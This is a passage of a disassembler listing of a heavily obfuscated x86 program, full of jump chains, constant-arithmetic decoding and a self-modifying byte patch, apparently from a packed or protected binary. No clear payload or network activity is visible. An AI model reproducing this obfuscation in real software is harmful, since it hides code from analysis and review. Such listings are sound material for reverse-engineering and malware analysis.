		cmp	eax, 5456EC5h
		jmp	loc_446723
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_137. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_448659:				; CODE XREF: sub_4465A6+124A1j
		jmp	loc_453102
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_44865E:				; CODE XREF: hvvrg7ie:004521FDj
		jmp	sub_457F50

; =============== S U B	R O U T	I N E =======================================



sub_448663	proc near		; CODE XREF: sub_407C57+Ep
					; sub_419C67+168p ...

; FUNCTION CHUNK AT 0043AB06 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043B72E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D74B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440355 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440BD2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004426B4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443CC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445773 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0044D412 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D446 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EDE7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004504BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451127 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451B90 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451C2C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452856 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00455170 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004553F1 SIZE 00000009 BYTES

		jz	loc_44D412
		push	8486C389h
		sbb	eax, 0A9A4B134h
		jmp	loc_4504BC
sub_448663	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 475BA966h
		push	offset loc_44E4F1
		jmp	locret_43ACBC
; ---------------------------------------------------------------------------
		push	0C207F839h
		pop	edx
		and	edx, 0A98DA5ECh
		rol	edx, 1Fh
		xor	edx, 677C2E43h
		push	edx
		pushf
		push	1AF8AF9Bh
		jmp	loc_44A38B
; ---------------------------------------------------------------------------
		shr	ebp, 10h
		jmp	loc_44A52D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44432F

loc_4486B1:				; CODE XREF: sub_44432F+F86Cj
		xor	ecx, 0B0FFEC56h
		xor	edx, edx
		div	ecx
		push	offset loc_43F149
		jmp	nullsub_178
; END OF FUNCTION CHUNK	FOR sub_44432F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_4486C5:				; CODE XREF: sub_4403D4:loc_45431Ej
		jz	loc_4395B8
		jmp	loc_44D5C5
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B395

loc_4486D0:				; CODE XREF: sub_45B395+8j
		jz	loc_44C65B
		jmp	loc_43B1E5
; END OF FUNCTION CHUNK	FOR sub_45B395
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440881

loc_4486DB:				; CODE XREF: sub_440881+487Dj
					; sub_440881:loc_44E5B9j
		push	3A4AD6C3h
		pop	eax
		xor	eax, 47EE6FF2h
		add	eax, 9F222FAEh
		add	eax, ebp
		add	eax, 0E339171Dh
		mov	eax, [eax]
		jmp	loc_43D02F
; END OF FUNCTION CHUNK	FOR sub_440881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_4486FC:				; CODE XREF: sub_44E533+67EBj
		jb	loc_43A0B9

loc_448702:				; CODE XREF: hvvrg7ie:loc_445947j
		push	0A29EFB2Bh
		pop	eax
		rol	eax, 0Dh
		sub	eax, 0DAD920CAh
		jmp	loc_442291
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_448716:				; CODE XREF: sub_43A839+15j
		cmp	eax, 9E266887h
		jmp	loc_44A280
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_448721:				; CODE XREF: sub_442FD1-2481j
		pop	eax
		xor	eax, 0E4EBB256h
		or	eax, 9535567Fh
		add	eax, 21F3CF2Fh
		rol	eax, 0Fh
		test	eax, 400h
		jmp	loc_44CF94
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_448742:				; CODE XREF: sub_43B7B9+1D3Bj
		push	19D16590h
		pop	edi
		and	edi, 0DF7AF5D8h
		sub	edi, 0DA7AE823h
		rol	edi, 0Eh
		sub	edi, 8DA76C5h
		add	edi, 0A9C423C1h
		jmp	loc_439370
; END OF FUNCTION CHUNK	FOR sub_43B7B9

; =============== S U B	R O U T	I N E =======================================



sub_448768	proc near		; CODE XREF: sub_43AB99+7p
					; hvvrg7ie:loc_44079Ap	...

; FUNCTION CHUNK AT 00441E30 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004542A9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B28F SIZE 00000005 BYTES

		jno	loc_4542A9
		push	ebp
		call	sub_458F43

loc_448774:				; CODE XREF: sub_459CC4+3j
		jmp	loc_441E30
sub_448768	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_448779:				; CODE XREF: sub_446D8D+1262Fj
		jmp	loc_445DD9
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458591

loc_44877E:				; CODE XREF: sub_458591-1CB18j
		jmp	nullsub_530
; END OF FUNCTION CHUNK	FOR sub_458591
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AC3B

loc_448783:				; CODE XREF: sub_43AC3B+16j
		jmp	loc_4412C8
; END OF FUNCTION CHUNK	FOR sub_43AC3B
; ---------------------------------------------------------------------------

loc_448788:				; CODE XREF: hvvrg7ie:0043B603j
		and	edi, 113493E5h
		xor	edx, 0EA5A66B9h
		test	eax, 0E5520D5Ch
		jmp	loc_4524DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_246. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ebx, 1EC53A5Ah
		sbb	ebx, 0A78B39EDh
		jmp	sub_4590E0
; ---------------------------------------------------------------------------

loc_4487B0:				; CODE XREF: hvvrg7ie:004432E5j
		pop	ecx
		jmp	loc_4479B4
; ---------------------------------------------------------------------------

loc_4487B6:				; CODE XREF: hvvrg7ie:0043A941j
		jl	loc_44ACD2
; START	OF FUNCTION CHUNK FOR sub_457740

loc_4487BC:				; CODE XREF: sub_457740+Aj
		jmp	loc_44BF1B
; END OF FUNCTION CHUNK	FOR sub_457740
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_4487C1:				; CODE XREF: sub_43D5FD+9227j
		jmp	nullsub_336
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
		add	ecx, eax
		shr	edx, 16h
		jmp	loc_44ACD0
; ---------------------------------------------------------------------------
		dd 5D8A8A0Fh
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_4487D6	proc near		; CODE XREF: sub_4410E1:loc_45861Cp
		xchg	ecx, [esp+0]
		pop	ecx
		pop	ecx

locret_4487DB:				; CODE XREF: hvvrg7ie:0043D5F8j
		retn
sub_4487D6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4487DC:				; CODE XREF: sub_44D2F8:loc_4575E9j
		jmp	loc_457880
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4487E1:				; CODE XREF: sub_440643-1CAj
		jmp	loc_44C801
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_4487E6:				; CODE XREF: sub_43D5FD+2D83j
					; sub_452AE5-1BAj
		rol	eax, 14h
		jmp	loc_451DF3
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_4487EE:				; CODE XREF: sub_43E163:loc_447242j
					; hvvrg7ie:00447263j
		rol	esi, 9
		add	esi, 512A75Fh
		xchg	esi, [esp+0]
		jmp	sub_43FC15
; END OF FUNCTION CHUNK	FOR sub_43E163
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_351. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sub	edi, edx
		jmp	sub_45868E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_448807:				; CODE XREF: sub_442F6B:loc_457E7Dj
		jnz	loc_43C2CC
		jmp	loc_4432EB
; END OF FUNCTION CHUNK	FOR sub_442F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439529

loc_448812:				; CODE XREF: sub_439529:loc_447A82j
		mov	byte ptr [eax],	0C3h
		jmp	loc_4390B8
; ---------------------------------------------------------------------------

loc_44881A:				; CODE XREF: sub_439529:loc_4390B8j
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		mov	eax, [esp-4+arg_0]
		jmp	loc_44DF65
; END OF FUNCTION CHUNK	FOR sub_439529

; =============== S U B	R O U T	I N E =======================================



sub_448828	proc near		; CODE XREF: hvvrg7ie:0043EB2Cj
					; sub_43B6A5:loc_44C7A0p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B29C SIZE 00000005 BYTES

		xchg	eax, [esp+0]

loc_44882B:				; CODE XREF: sub_43A839+FA59j
		pop	eax
		add	edx, 7E9497Fh
		xchg	edx, [esp-4+arg_0]
		jmp	loc_43B29C
sub_448828	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp]
		jmp	loc_453037
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_243. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_448846:				; CODE XREF: hvvrg7ie:00447C7Dj
		jmp	loc_45987E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443DF4

loc_44884B:				; CODE XREF: sub_443DF4+8j
		jmp	loc_4588FA
; END OF FUNCTION CHUNK	FOR sub_443DF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB2D

loc_448850:				; CODE XREF: sub_44AB2D-675Bj
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_44AB2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4596EB

loc_448856:				; CODE XREF: sub_4596EB+3j
		jmp	loc_45B321
; END OF FUNCTION CHUNK	FOR sub_4596EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A01E

loc_44885B:				; CODE XREF: sub_44A01E+7j
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_44A01E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465E5

loc_448860:				; CODE XREF: sub_4465E5-759Cj
		jmp	loc_43A2B6
; END OF FUNCTION CHUNK	FOR sub_4465E5
; ---------------------------------------------------------------------------
		db 86h,	62h, 0B5h
dword_448868	dd 43BE4EC7h		; DATA XREF: sub_44FFD8+Dw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D36

loc_44886C:				; CODE XREF: sub_458D36+17j
		jmp	loc_43DB76
; END OF FUNCTION CHUNK	FOR sub_458D36

; =============== S U B	R O U T	I N E =======================================



sub_448871	proc near		; CODE XREF: sub_410661+22p
					; sub_41960F+29p ...
		call	sub_448881
		jmp	ds:off_41D054
sub_448871	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_44887C:				; CODE XREF: sub_43A839+1BB36j
		jmp	nullsub_238
; END OF FUNCTION CHUNK	FOR sub_43A839

; =============== S U B	R O U T	I N E =======================================



sub_448881	proc near		; CODE XREF: sub_448871p
					; sub_4498AE:loc_4540CCj ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D906 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456AA1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004587B7 SIZE 00000008 BYTES

		pop	edx
		jmp	loc_456AA1
sub_448881	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_425. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_448888:				; CODE XREF: hvvrg7ie:00457B75j
		jmp	loc_44E854
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453D30

loc_44888D:				; CODE XREF: sub_453D30+3j
		jmp	sub_453E08
; END OF FUNCTION CHUNK	FOR sub_453D30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_448892:				; CODE XREF: sub_442FD1-9848j
					; sub_4500FA:loc_45528Cj
		jmp	loc_44A4F6
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478FE

loc_448897:				; CODE XREF: sub_4478FE:loc_45A942j
		push	0D0A79B7Ch
		xchg	esi, [esp+4+var_4]
		mov	edx, esi
		shr	esi, 18h
		jmp	loc_43FED5
; END OF FUNCTION CHUNK	FOR sub_4478FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_4488A9:				; CODE XREF: sub_45B9BB:loc_452D44j
		or	edx, 727DCDB6h
		jmp	loc_459BDD
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4488B4:				; CODE XREF: sub_44D2F8+5544j
		jl	loc_43D88A
		cmp	ebp, edi
		jmp	loc_4473AA
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		push	edx
		push	9FA35228h
		pop	edx
		rol	edx, 1Ah
		jmp	loc_44B65C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_4488D0:				; CODE XREF: sub_457A97+13j
		xchg	ebp, [esp-4+arg_0]
		push	ecx
		push	0CC4F78E2h
		pop	ecx
		sub	ecx, ds:4000F9h
		add	ecx, 4DFEA381h
		jmp	loc_45864A
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4488EB:				; CODE XREF: sub_440643+103EAj
		jge	loc_44B371

loc_4488F1:				; CODE XREF: sub_45038B+AC70j
		jmp	loc_44C98B
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
		adc	edi, eax
		mov	ecx, [ebp+0]
		add	esi, 2D29D282h
		popf
		jmp	loc_44B371
; ---------------------------------------------------------------------------
		test	esi, ecx
		jmp	loc_449147
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44890E:				; CODE XREF: hvvrg7ie:loc_43B21Fj
					; sub_43E128:loc_45A90Cj
		jz	loc_44CD31
		jmp	loc_44A9D7
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
		jbe	loc_44A3B4
		xchg	edi, [ebx]
		jmp	sub_43972A
; ---------------------------------------------------------------------------

loc_448926:				; CODE XREF: hvvrg7ie:00442EB2j
		jno	loc_4475BD
		jbe	loc_43E274
		mov	ebp, 8A94A0E9h

loc_448937:				; CODE XREF: hvvrg7ie:0045B1CBj
		rol	edi, 14h
		jmp	loc_44F865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44893F:				; CODE XREF: sub_450246:loc_43F091j
					; sub_450246-111ABj ...
		add	ebx, 0ED0E052Dh
		push	offset sub_44E031
		jmp	nullsub_393
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44894F:				; CODE XREF: sub_44388C:loc_453196j
		mov	esi, [ebp+0]
		shr	esi, 0Eh
		cmp	ecx, 0A25FDB74h
		jmp	loc_44756F
; END OF FUNCTION CHUNK	FOR sub_44388C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481B6

loc_448961:				; CODE XREF: sub_4481B6:loc_446988j
					; hvvrg7ie:00450EDDj
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_4481B6
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D0A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E56

loc_44896C:				; CODE XREF: sub_443E56+Aj
		jmp	loc_451193
; END OF FUNCTION CHUNK	FOR sub_443E56
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_275. PRESS KEYPAD	"+" TO EXPAND]
		dw 0A883h
		dd 680000F3h, 43F2DDh, 6491E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_448981:				; CODE XREF: sub_450F97:loc_439912j
					; hvvrg7ie:0043AC20j
		rol	edx, 13h
		xor	edx, 1926EE37h
		add	edx, ebp
		add	edx, 0F303CB5Bh
		mov	edx, [edx]
		jmp	loc_44CA1B
; END OF FUNCTION CHUNK	FOR sub_450F97
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_245. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_44899A:				; CODE XREF: sub_4512A0-3D53j
		jmp	loc_440A3C
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_44899F:				; CODE XREF: sub_44C072+11j
		jmp	loc_446C35
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_4489A4:				; CODE XREF: sub_446E8C+201Dj
		jmp	loc_458ABA
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------

loc_4489A9:				; CODE XREF: hvvrg7ie:00446C9Aj
		jmp	loc_44553F

; =============== S U B	R O U T	I N E =======================================



sub_4489AE	proc near		; CODE XREF: hvvrg7ie:loc_43B44Ep
					; hvvrg7ie:loc_43E2E3p	...

var_4		= dword	ptr -4

		push	eax
		mov	eax, ebp
		xchg	eax, [esp+4+var_4]
		push	offset loc_4391A4
		jmp	nullsub_71
sub_4489AE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BB7

loc_4489BE:				; CODE XREF: sub_447BB7-8794j
		mov	eax, [esp+0]
; END OF FUNCTION CHUNK	FOR sub_447BB7
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_4489C1:				; CODE XREF: sub_441DDD:loc_451A0Dj
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_441DDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_4489C7:				; CODE XREF: sub_4403B6:loc_43B556j
		push	edi
		push	413D9F90h
		pop	edi
		add	edi, 9F53E721h
		and	edi, 179F4480h
		jmp	loc_448E88
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_4489DF:				; CODE XREF: sub_454789:loc_43D58Aj
		call	sub_449C58

loc_4489E4:				; CODE XREF: sub_44E5F5+Fj
		jmp	loc_43DFDC
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_4489E9:				; CODE XREF: sub_4403B6+1174Ej
		or	eax, 9F0A027h
		add	eax, 0B6D5ABB2h
		call	sub_450C5A
		xor	eax, 9C4E704Eh
		push	ebx
		push	61C34A82h
		pop	ebx
		jmp	loc_43E236
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
		pushf
		and	eax, 0F7D97631h
		jmp	sub_43C2A3

; =============== S U B	R O U T	I N E =======================================



sub_448A18	proc near		; CODE XREF: sub_43AFB6+19p
					; hvvrg7ie:00451F9Aj

; FUNCTION CHUNK AT 00453862 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_445616
		mov	ds:dword_45A8B0, eax
		jmp	loc_453862
sub_448A18	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		popf
		jnz	loc_43B65A
		mov	ebx, 147E072Fh
		jmp	loc_4408BD
; ---------------------------------------------------------------------------

loc_448A3C:				; CODE XREF: hvvrg7ie:004525B2j
		shl	edi, 9
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_448A3F:				; CODE XREF: sub_453BBD:loc_4525A3j
		rol	ebx, 15h
		sub	ebx, 350865CCh
		add	ebx, 0AFAC6B46h
		popf
		xchg	ebx, [esp+4+var_4]
		jmp	loc_450B16
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------

loc_448A57:				; CODE XREF: hvvrg7ie:loc_450909j
		jge	loc_456241
		jmp	loc_44515A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_448A62:				; CODE XREF: sub_44D2F8:loc_458726j
		jnz	loc_45486B
		jmp	loc_43C538
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_448A6D:				; CODE XREF: sub_450F97-7326j
		ja	loc_43DE3E
		push	esi
		jmp	loc_43FAFA
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_448A79:				; CODE XREF: sub_450434-C1B3j
		jns	loc_442B7A
		and	esi, eax

loc_448A81:				; CODE XREF: sub_450434:loc_44A6AAj
		push	esi
		push	0A7EB93C4h
		pop	esi
		and	esi, 43C27F91h
		jmp	loc_455D05
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		sub	ecx, eax
		xor	edx, ecx
		jmp	sub_44A3D7
; ---------------------------------------------------------------------------

loc_448A9C:				; CODE XREF: hvvrg7ie:0043E2FCj
		jge	loc_45B67E
; START	OF FUNCTION CHUNK FOR sub_43CC78

loc_448AA2:				; CODE XREF: sub_43CC78+5j
		jmp	loc_446B3C
; END OF FUNCTION CHUNK	FOR sub_43CC78
; ---------------------------------------------------------------------------

loc_448AA7:				; CODE XREF: hvvrg7ie:0043B960j
		jmp	loc_44F558
; ---------------------------------------------------------------------------
		adc	edx, 0C6710B0Ah
		xchg	edi, [ebp+0]
		jmp	loc_45B67D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B5E2

loc_448ABA:				; CODE XREF: sub_43B5E2+Aj
		pop	ebx
		add	ebx, 4E11C8B3h
		and	ebx, 0D367FD23h

loc_448AC7:				; CODE XREF: hvvrg7ie:0045950Aj
		add	ebx, 7EFFFD85h
		popf
		jmp	loc_439507
; END OF FUNCTION CHUNK	FOR sub_43B5E2
; ---------------------------------------------------------------------------

loc_448AD3:				; CODE XREF: hvvrg7ie:loc_450131j
		sub	ecx, ebp
		xor	edi, 0F3016841h
		jmp	sub_44E23D

; =============== S U B	R O U T	I N E =======================================



sub_448AE0	proc near		; CODE XREF: sub_444CF3+1p
					; hvvrg7ie:00456D16j
		xchg	eax, [esp+0]
		pop	eax
		mov	ebp, esp
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+0]
		push	offset loc_45030F
		jmp	nullsub_72
sub_448AE0	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_224. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_448AF7:				; CODE XREF: sub_44BEBB-47D2j
		jmp	loc_45B7EE
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446A88

loc_448AFC:				; CODE XREF: sub_446A88+Bj
		push	offset loc_44ADC5
		jmp	loc_4428C3
; END OF FUNCTION CHUNK	FOR sub_446A88

; =============== S U B	R O U T	I N E =======================================



sub_448B06	proc near		; DATA XREF: sub_446966+18o

; FUNCTION CHUNK AT 0044ADC5 SIZE 00000008 BYTES

		neg	eax
		cmp	ax, 0A5B3h
		jnz	loc_446970

loc_448B12:				; CODE XREF: hvvrg7ie:loc_44D30Bj
		retn
sub_448B06	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44543A

loc_448B13:				; CODE XREF: sub_44543A:loc_4427C4j
		jge	loc_441794
		mov	edi, 5445F1C6h
		push	esi
		jmp	loc_43A7C7
; END OF FUNCTION CHUNK	FOR sub_44543A
; ---------------------------------------------------------------------------

loc_448B24:				; CODE XREF: hvvrg7ie:00446ABAj
		push	ecx
		push	esi
		push	42C90E0Bh
		pop	esi
		or	esi, 0F4409AEBh
		sub	esi, 466B399Fh
		jmp	loc_43CD92
; ---------------------------------------------------------------------------
		adc	eax, edi
		jmp	loc_4403B4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_552. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_448B45:				; CODE XREF: hvvrg7ie:loc_43E5C7j
		retn
; ---------------------------------------------------------------------------
		push	5164F09Ch
		pop	edx
		rol	edx, 1Ch
		test	edx, 10h
		jmp	loc_458525
; ---------------------------------------------------------------------------

loc_448B5A:				; DATA XREF: sub_454099-1314Co
		push	eax
		call	sub_4584F2
		push	4A8AE951h
		pop	eax
		jmp	loc_43C87D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B8D

loc_448B6B:				; CODE XREF: sub_442B8D+16j
		push	dword ptr [ebp-4]
		call	sub_444E49
		jmp	loc_44AACA
; END OF FUNCTION CHUNK	FOR sub_442B8D

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_448B78	proc near		; CODE XREF: sub_442B8D+11p

; FUNCTION CHUNK AT 0043EEF0 SIZE 0000000D BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_43EEF0
sub_448B78	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_448B81:				; CODE XREF: sub_44398A+E25Dj
		jno	sub_43EB47
		sbb	edi, eax

loc_448B89:				; CODE XREF: sub_44398A:loc_447EE3j
					; sub_44E533+81E6j ...
		push	offset sub_44170F
		jmp	sub_45861B
; END OF FUNCTION CHUNK	FOR sub_44398A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_202. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_448B94:				; CODE XREF: sub_4544DD-5F29j
		jmp	loc_4391D7
; END OF FUNCTION CHUNK	FOR sub_4544DD

; =============== S U B	R O U T	I N E =======================================



sub_448B99	proc near		; CODE XREF: sub_456DE7+3j

; FUNCTION CHUNK AT 0043AE0F SIZE 00000015 BYTES

		add	esp, 0FFFFFFF8h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		mov	edx, [ebp-8]
		jmp	loc_43AE0F
sub_448B99	endp

; ---------------------------------------------------------------------------

loc_448BAA:				; CODE XREF: hvvrg7ie:0043CEE0j
		jnb	loc_43E052
		and	ecx, ebp

; =============== S U B	R O U T	I N E =======================================



sub_448BB2	proc near		; CODE XREF: sub_451754+7p

; FUNCTION CHUNK AT 00454B79 SIZE 0000001B BYTES

		xchg	esi, [esp+0]
		pop	esi
		jmp	loc_454B79
sub_448BB2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448BBB:				; CODE XREF: hvvrg7ie:0043C451j
		push	0D9921501h

; =============== S U B	R O U T	I N E =======================================



sub_448BC0	proc near		; CODE XREF: sub_451E6Dp

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043923D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00439805 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043B82C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043C61B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D750 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043E5E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FA68 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440015 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044354C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444ACC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444C1A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044579B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445F8D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00448D14 SIZE 00000005 BYTES
